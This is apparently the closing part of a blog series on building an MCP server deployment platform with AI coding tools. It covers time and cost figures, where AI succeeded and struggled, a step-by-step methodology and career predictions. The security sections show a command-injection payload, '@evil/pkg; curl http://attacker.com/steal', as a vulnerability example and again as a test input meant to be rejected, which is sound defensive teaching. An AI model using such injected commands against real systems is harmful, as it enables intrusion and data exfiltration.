Part 7: Lessons Learned - The AI Orchestrator's Handbook

The Story So Far: In 2 weeks (Dec 11-23, 2025), I built a production MCP deployment platform entirely with AI orchestration. Zero lines manually coded. But what did I actually learn?

This is the handbook I wish I had on Day 1.

The Final Numbers

Before the lessons, let's quantify what AI orchestration achieved:

Quantitative Results

Time Investment: ~60 hours over 13 days

AI code generation: ~15 hours (25%)
Code review & validation: ~12 hours (20%)
Debugging infrastructure: ~18 hours (30%)
Testing and quality assurance: ~8 hours (13%)
Documentation: ~7 hours (12%)

Code Output:

Backend (Python): ~2,100 lines
Frontend (TypeScript): ~1,300 lines
Infrastructure (Docker, configs): ~200 lines
Tests: ~800 lines
Total: ~4,400 lines of production code

Documentation:

AI_ORCHESTRATION.md: 3,500 words
CONTRIBUTING.md: 800 words
AUTH_TROUBLESHOOTING.md: 600 words
SETUP.md: 600 words
DEPLOYMENT.md: 900 words
README.md: 1,200 words
Context files: ~5,000 words
Total: ~13,000 words (3x the code volume)

Quality Metrics:

Test coverage: 87%
Type safety: 100% (zero any types in TypeScript)
Linter compliance: 100% (passes ruff and eslint with zero warnings)
Security review: Passed multi-agent audit (4 AI reviewers)

Production Deployment:

Backend: https://catwalk-backend.fly.dev ✅
PostgreSQL: Fly.io managed database ✅
Frontend: Vercel deployment ✅
End-to-end MCP tool calling: Works ✅

Manual Coding: 0 lines

Everything generated by AI
My role: architect, reviewer, debugger, validator

Estimated Time Savings vs Manual Coding: ~150 hours

Traditional estimate for this scope: ~200 hours
Actual time spent: ~60 hours
Savings: ~140 hours (70% reduction)

Qualitative Results

System Architecture: Comparable to senior engineer design

3-layer architecture (Frontend → Backend → MCP Containers)
Proper separation of concerns
Security-first credential management
Production-grade error handling

Code Quality: Production-ready

Type-safe throughout
Comprehensive error handling
Extensive input validation
Secret masking and audit logging

Developer Experience: Smooth

Clear setup instructions
Robust error messages
Comprehensive troubleshooting guides
Active documentation

Proof of Concept: Validated

Open source: https://github.com/zenchantlive/catwalk
MIT licensed
Reproducible methodology documented
Real production deployment

Where AI Excelled

1. Boilerplate and Patterns (95%+ AI Success Rate)

What AI nailed:

FastAPI endpoint scaffolding
SQLAlchemy model relationships
Pydantic validation schemas
React component structure
TypeScript type definitions
Alembic database migrations
Docker multi-stage builds
API client generation

Example: Dynamic form generation component

Prompt:

Create a FormBuilder component that:
- Takes AnalysisResult as input
- Generates form fields from env_vars array
- Uses password inputs for secrets
- Validates required fields
- Type-safe with TypeScript strict mode

AI delivered: ~150 lines of perfect TypeScript in under 5 minutes.

Why this worked: Form generation is a well-documented pattern in React. Massive training data.

2. Testing (90%+ AI Success Rate)

What AI generated perfectly:

Unit test structure (pytest, Vitest)
Mocking patterns (unittest.mock, vi.mock)
Integration test scenarios
Edge case coverage
Assertion logic

Example: Package validator tests

# Generated by Claude Code
@pytest.mark.asyncio
async def test_validate_package_npm_success():
    """Test successful npm package validation"""
    validator = PackageValidator()

    result = await validator.validate_package("@modelcontextprotocol/server-github")

    assert result["valid"] is True
    assert result["runtime"] == "npm"
    assert result["error"] is None

@pytest.mark.asyncio
async def test_validate_package_invalid():
    """Test invalid package name"""
    validator = PackageValidator()

    result = await validator.validate_package("definitely-not-a-real-package-xyz")

    assert result["valid"] is False
    assert result["runtime"] == "unknown"
    assert "not found" in result["error"]

51 tests generated. 90% worked first try. 10% needed minor mock adjustments.

Why this worked: Testing patterns are formulaic. AI has seen millions of test examples.

3. Documentation Structure (85%+ AI Success Rate)

What AI generated well:

README.md templates
API documentation (Swagger/OpenAPI)
Inline code comments
Setup instructions
Architecture diagrams (Mermaid markdown)

Example: SETUP.md generated from a simple prompt

Prompt: "Write SETUP.md with local development instructions for both backend and frontend"

AI delivered: Complete setup guide with:

Prerequisites
Step-by-step installation
Environment variable configuration
Running tests
Troubleshooting common issues

Why this worked: Documentation templates are abundant in open source projects.

4. Refactoring (80%+ AI Success Rate)

What AI did efficiently:

Extract functions into modules
Rename variables consistently
Update imports across files
Convert camelCase ↔ snake_case
Add type hints to existing code

Example: Extracted Zod schema generation from FormBuilder component

Prompt: "Extract Zod schema generation logic from FormBuilder.tsx into a dedicated utility file"

AI output:

Created lib/generate-zod-schema.ts with extracted logic
Updated FormBuilder.tsx to import the utility
Updated all tests to use new utility
Fixed all import paths

Time: ~2 minutes

Manual estimate: ~20 minutes (find all references, update imports, validate)

Why this worked: Refactoring is pattern matching. AI understands dependency graphs.

Where AI Struggled

1. Infrastructure-Specific Quirks (30% AI Success Rate)

What AI got wrong initially:

PostgreSQL driver selection (asyncpg vs psycopg3)
Fly.io SSL parameter handling
Docker CRLF line ending issues (Windows)
Environment variable timing (build vs runtime)
Fly.io Postgres cluster recovery

Example: The asyncpg disaster

AI's first suggestion:

# Use asyncpg for PostgreSQL
pip install asyncpg
DATABASE_URL = "postgresql+asyncpg://..."

The reality: asyncpg doesn't support Fly.io's sslmode parameter → crashes

The fix (manual):

# Use psycopg3 instead
pip install psycopg[binary]
DATABASE_URL = "postgresql+psycopg://..."

Why AI struggled: Fly.io-specific quirks aren't in training data. Infrastructure combinations (Fly.io + SQLAlchemy + SSL) are niche.

Lesson: Don't trust AI blindly on infrastructure. Validate in real environments.

2. Security Vulnerabilities (20% AI Success Rate)

What AI missed:

Command injection in package name handling
Credential leaks in API responses
Missing input validation
Race conditions in concurrent code
Lack of audit logging

Example: Command injection vulnerability

AI-generated code:

# VULNERABLE - no validation
package_name = user_input["package"]
env = {"MCP_PACKAGE": package_name}  # Injected into shell

The attack:

package_name = "@evil/pkg; curl http://attacker.com/steal"
# Shell executes: npx -y @evil/pkg; curl http://attacker.com/steal

Why AI missed this: AI generates happy paths. Security requires adversarial thinking.

Solution: Use multi-agent code review (CodeRabbit caught this)

3. Cross-System Integration (40% AI Success Rate)

What AI failed to connect:

NextAuth session → PostgreSQL user sync
JWT token creation → backend verification
Frontend auth flow → backend dependencies
Fly.io machine creation → backend proxying

Example: The user sync gap

AI generated:

NextAuth configuration ✅
JWT signing logic ✅
Backend auth middleware ✅

AI didn't generate:

The glue code that syncs users from NextAuth to PostgreSQL

Why this happened: Each piece exists in training data, but the integration between them is project-specific.

Lesson: AI generates components. You architect how they fit together.

4. Environment Configuration (10% AI Success Rate)

What AI couldn't validate:

Whether .env files have required secrets
If Fly.io secrets are set correctly
Secret value mismatches between environments
Timing issues (when env vars are loaded)

Example: AUTH_SECRET mismatch nightmare (Part 5)

AI generated: Code that uses process.env.AUTH_SECRET

AI didn't check:

Is this variable defined in .env.local?
Does it match the backend secret?
Is it set at build time or runtime?

Result: Days of debugging 401 errors

Why AI can't help: Environment state is invisible to AI. It only sees code.

Lesson: Manual environment validation is non-negotiable.

5. Debugging Production Issues (5% AI Success Rate)

What AI couldn't debug:

Fly.io Postgres "no active leader found" error
SSL certificate issues
Network connectivity between machines
Log interpretation

Example: PostgreSQL cluster failure

The error: no active leader found

AI's suggestion: "Try restarting the database"

The reality: Single-node cluster in unrecoverable state. Must destroy and recreate.

Why AI failed: Requires infrastructure knowledge (Fly.io Postgres architecture) + log interpretation + operational experience.

Lesson: Infrastructure debugging is still human work.

The Reproducible Methodology

Based on this journey, here's the step-by-step framework for AI-orchestrated development:

Phase 1: Foundation (Before Writing Code)

Step 1: Create Context Structure

Before a single line of code:

project/
├── AGENTS.md              # AI system prompt
├── context/
│   ├── ARCHITECTURE.md    # System design
│   ├── CURRENT_STATUS.md  # Living status doc
│   ├── TECH_STACK.md      # Every dependency + why
│   └── Project_Overview.md # Problem + solution

Step 2: Write Structured Prompts

Bad prompt: "Build an MCP deployment platform"

Good prompt:

Build a platform for deploying MCP servers to Fly.io.

REQUIREMENTS:
- GitHub repo analysis with Claude API
- Credential encryption (Fernet)
- Fly.io machine deployment
- MCP Streamable HTTP (2025-06-18 spec)

TECH STACK:
- Frontend: Next.js 15, React 19, TypeScript 5+ (strict mode)
- Backend: FastAPI, PostgreSQL + psycopg3, SQLAlchemy async
- Infrastructure: Fly.io Machines API, Docker

QUALITY:
- Zero TypeScript 'any' types
- Passes ruff (Python) / eslint (TypeScript) with zero warnings
- Comprehensive error handling
- Input validation with Pydantic

SECURITY:
- Validate all user input
- Mask secrets in API responses
- No shell injection risks
- Audit logging for sensitive actions

SUCCESS CRITERIA:
- End-to-end MCP tool calling works
- Production deployed on Fly.io
- 85%+ test coverage

Step 3: Multi-AI Cross-Validation

Feed the same prompt to:

Claude Code
ChatGPT-4
Google Gemini

Compare architectures. Where they agree = good design. Where they disagree = complexity indicator.

Phase 2: Implementation (Code Generation)

Step 4: Phase-Based Development

Break project into explicit phases:

Phase 1: Database models + encryption
Phase 2: Analysis service
Phase 3: Deployment orchestration
Phase 4: Frontend UI
Phase 5: Production deployment

One phase per session. Don't let AI scope-creep.

Step 5: Generate Code with Constraints

Always include:

CONSTRAINTS:
- Type-safe (no 'any' in TypeScript, full hints in Python)
- Linter-compliant (must pass ruff/eslint)
- Error handling for all failure modes
- Tests for critical paths

Update CURRENT_STATUS.md when done.

Step 6: Immediate Validation

After each code generation:

# Backend
ruff check .
ruff format .
pytest

# Frontend
bun run typecheck
bun run lint
bun run test

Don't proceed until all checks pass.

Phase 3: Quality Control (Validation)

Step 7: Multi-Agent Code Review

Set up on GitHub (free for open source):

CodeRabbit (security)
Qodo (edge cases)
Gemini Code Assist (quality)
Greptile (integration)

Create PR for each phase. Let agents review.

Step 8: Fix Review Feedback

Feed agent comments back to AI:

CodeRabbit flagged command injection in deployment service.
Add package validation against npm/PyPI registries before deploying.

AI generates fixes. You validate.

Step 9: Test in Real Environments

Don't trust local development.

Deploy to staging (or production if you're brave):

Real database (not SQLite)
Real secrets management
Real network conditions
Real SSL/TLS

Catch environment issues early.

Phase 4: Documentation (Knowledge Capture)

Step 10: Document As You Go

After each debugging session:

Update CURRENT_STATUS.md (what works, what doesn't)
Update AGENTS.md if you learned new AI interaction patterns
Create troubleshooting docs for nasty bugs (like AUTH_TROUBLESHOOTING.md)

Step 11: Write for Future You

Assume you'll forget everything in 1 week.

Document:

Why you chose psycopg3 over asyncpg
How to recover from Fly.io Postgres failures
Which secrets must match across environments

Future you will thank past you.

Phase 5: Security Audit (Adversarial Review)

Step 12: Think Like an Attacker

AI generates happy paths. You must find malicious paths.

Ask:

What if user input contains shell metacharacters?
What if API key is compromised?
What if user submits 10,000 requests/second?
What if database connection fails mid-transaction?

Prompt AI for fixes:

Add input validation that rejects shell metacharacters.
Add rate limiting (100 req/min per IP).
Add transaction rollback on errors.

Step 13: Security Testing

Generate attack scenarios:

# Test command injection
malicious_package = "@evil/pkg; curl http://attacker.com"
response = await create_deployment({"package": malicious_package})
assert response.status_code == 400  # Must reject

If tests pass = exploit blocked. If tests fail = vulnerability found.

Phase 6: Production Hardening (Polish)

Step 14: Error Message Quality

Bad (AI default):

{"error": "Failed to create deployment"}

Good (prompt for better UX):

{
  "error": "invalid_package",
  "message": "Package '@evil/pkg; curl' not found in npm or PyPI",
  "help": "Verify the package name at https://npmjs.com",
  "docs": "https://docs.catwalk.live/troubleshooting#invalid-package"
}

Step 15: Observability

Add logging, metrics, and monitoring:

logger.info(f"Deployment {id} created by user {user.email}")
logger.warning(f"Package validation failed: {package_name}")
logger.error(f"Fly.io API error: {error}", extra={"deployment_id": id})

Production debugging without logs is impossible.

The Skill Shift

Old Role: Developer (Code Writer)

Primary skill: Writing syntactically correct code

Daily work:

Implementing functions line-by-line
Debugging syntax errors
Googling "how to X in language Y"
Stack Overflow for common patterns

Value: Lines of code produced

New Role: AI Orchestrator (System Architect)

Primary skill: Architecting systems and validating AI outputs

Daily work:

Designing system architecture
Writing structured prompts with constraints
Reviewing AI-generated code for logic errors
Debugging infrastructure and integration issues
Thinking adversarially about security
Documenting decisions and debugging paths

Value: System quality and velocity

What This Means for Your Career

Skills that INCREASE in value:

System design - AI needs architectural direction
Prompt engineering - Specificity = quality
Code review - Validating AI outputs critically
Debugging - Infrastructure, integration, environment
Security thinking - Adversarial mindset
Documentation - Making implicit knowledge explicit

Skills that DECREASE in value:

Syntax memorization - AI knows every API
Boilerplate writing - AI generates it instantly
Pattern copying - AI has seen all patterns
Manual refactoring - AI does it faster

The transition: From writing code → validating systems

Analogy: Before trucks, moving rocks required strong backs. After trucks, it required knowing how to drive and where to deliver.

Common Pitfalls and How to Avoid Them

Pitfall 1: Blindly Trusting AI

Symptom: Merging AI-generated code without review

Risk: Security vulnerabilities, logic errors, integration failures

Solution:

Always run linters and tests
Review diffs manually
Think: "What could go wrong?"
Use multi-agent code review

Pitfall 2: Vague Prompts

Symptom: AI generates code that "kind of works" but has issues

Risk: Wasted time iterating, poor code quality

Solution:

Specific tech stack (Next.js 15, not just "React")
Explicit constraints (no 'any' types, must pass linter)
Success criteria (what does "done" look like?)

Pitfall 3: No External Memory

Symptom: AI "forgets" decisions across sessions, regenerates code you already rejected

Risk: Inconsistent architecture, wasted effort

Solution:

Create AGENTS.md and context/ structure
Update after each session
Start new sessions by loading context

Pitfall 4: Skipping Environment Validation

Symptom: Code works locally but fails in production

Risk: Deployment disasters, late-night debugging

Solution:

Test in production-like environments early
Validate secrets are set before deploying
Document environment setup explicitly

Pitfall 5: Ignoring Review Agents

Symptom: Security issues and quality problems slip through

Risk: Vulnerabilities in production, maintainability issues

Solution:

Set up CodeRabbit, Qodo, Gemini Code Assist, Greptile
Review all their comments
Feed feedback back to AI for fixes

The Economics of AI Orchestration

Costs

AI Services (my actual usage):

Claude Code (Anthropic CLI): $0 (included in Claude Pro subscription)
OpenRouter (analysis service): ~$2 (used Claude Haiku 4.5)
GitHub Copilot: Not used
ChatGPT Plus: $20/month (used for cross-validation)

Total AI costs: ~$22 for the project

Infrastructure:

Fly.io backend: ~$2/month (always-on shared-cpu)
PostgreSQL: $0 (free tier)
Vercel frontend: $0 (free tier)

Total infrastructure: ~$2/month

Time Investment: ~60 hours @ $100/hour freelance rate = $6,000 opportunity cost

Value Created

Code produced: ~4,400 lines production-ready

Traditional estimate: ~200 hours @ $100/hour = $20,000
AI-assisted actual: ~60 hours @ $100/hour = $6,000
Savings: $14,000 (70% time reduction)

Alternatives considered:

Hire developers: $10,000+ for this scope
Learn to code manually: 6+ months to reach this proficiency
Use no-code tools: Doesn't exist for this use case (MCP deployment)

ROI: 635x return on AI costs ($14,000 saved / $22 AI cost)

Intangible value:

Learned AI orchestration methodology (transferable skill)
Portfolio piece (open source project)
Documentation case study (blog series)
Validated production deployment (proof of concept)

The Future (My Predictions)

1-2 Years: AI Orchestration Becomes Standard

What changes:

"Junior developer" means "good at prompting AI"
Code review becomes "AI output review"
10x productivity gains become normal
Solo founders ship enterprise-scale products

What doesn't change:

System architecture still requires humans
Security thinking still requires humans
Product decisions still require humans
Debugging infrastructure still requires humans

3-5 Years: AI Handles More of the Stack

Speculation:

AI debugs infrastructure (interprets logs, fixes config)
AI performs security audits automatically
AI handles deployment and rollbacks
AI writes documentation from code changes

What humans do:

Define product vision
Make trade-off decisions
Validate system behavior
Handle novel problems (edge cases AI hasn't seen)

10+ Years: Unknown

Possibilities:

AI handles full system design
Human role becomes "product vision" only
Or: We discover new bottlenecks AI can't solve
Or: Human oversight remains critical for safety

What I believe: The orchestration skill (getting AI to build what you envision) will remain valuable indefinitely.

Your Action Plan

Want to replicate this methodology? Here's your Week 1:

Day 1: Setup

Sign up for Claude Code (or Cursor, or Copilot)
Create a project with AGENTS.md and context/ structure
Install linters (ruff for Python, eslint for TypeScript)

Day 2: Practice Prompting

Choose a simple project (e.g., "Build a todo API")
Write a structured prompt with constraints
Generate code, run linters, iterate

Day 3: Review and Validate

Set up CodeRabbit on GitHub (free for open source)
Create PR with AI-generated code
Review agent feedback, feed back to AI

Day 4: Infrastructure Deploy

Deploy to real environment (Fly.io, Vercel, Railway)
Encounter environment issues
Document solutions

Day 5: Security Thinking

Try to break your own system
Generate attack scenarios as tests
Prompt AI to fix vulnerabilities

Day 6: Documentation

Write troubleshooting guide
Update AGENTS.md with learnings
Create README for future you

Day 7: Reflect

What did AI do well?
What required manual intervention?
How would you do it differently next time?

Repeat this cycle. Each iteration, you'll get faster and more effective.

Final Thoughts

Can AI build production systems?

Yes - with heavy human orchestration.

AI is not a replacement for developers. It's a power tool that amplifies human architects.

The skill isn't coding anymore. It's:

Architecting systems worth building
Prompting AI with precision
Validating outputs critically
Debugging the real world
Making trade-offs under uncertainty

This is the new craft.

And honestly? I love it.

I get to focus on problems I care about (MCP deployment UX, credential security, system architecture) instead of fighting syntax errors and writing boilerplate.

AI handles the tedious. I handle the interesting.

That's the future I want to build in.

Acknowledgments

Built with:

Claude Code (Anthropic) - Primary implementation
Cursor - Refactoring and iteration (mentioned in docs)
Google Gemini - Planning and cross-validation
ChatGPT-4 - Architecture validation

Reviewed by:

CodeRabbit - Security analysis
Qodo - Edge case detection
Gemini Code Assist - Code quality
Greptile - Integration checks

Inspired by:

Vercel's developer experience
The MCP ecosystem
The AI orchestration community
Every developer frustrated with infrastructure complexity

Special thanks to you, the reader, for making it through all 7 parts. If this series helped you, pay it forward - share the methodology.

Where to Go From Here

Explore the codebase:

GitHub: https://github.com/zenchantlive/catwalk
Complete methodology: AI_ORCHESTRATION.md
Contribution guide: CONTRIBUTING.md

Try it yourself:

Fork the repo
Deploy to Fly.io
Contribute improvements
Document your own AI orchestration journey

Connect:

Questions? Open a GitHub issue
Built something similar? Share in discussions
Want to hire an AI orchestrator? Email: jordanlive121@gmail.com

Read the other parts:

Part 1: Genesis
Part 2: Foundation
Part 3: Production Baptism
Part 4: The Pivot
Part 5: Authentication Hell
Part 6: Security Awakening
Part 7: Lessons Learned (you are here)

This is the end of the series. But it's just the beginning of AI-orchestrated development.

Your turn. Build something.

Series: Building Catwalk Live with AI Orchestration (Complete) Author: Jordan Hindo (AI Orchestrator, Technical Product Builder) Project: https://github.com/zenchantlive/catwalk License: MIT Published: December 2025

All 7 parts written, researched, and structured - documenting a real journey from initial commit to production deployment, entirely through AI orchestration.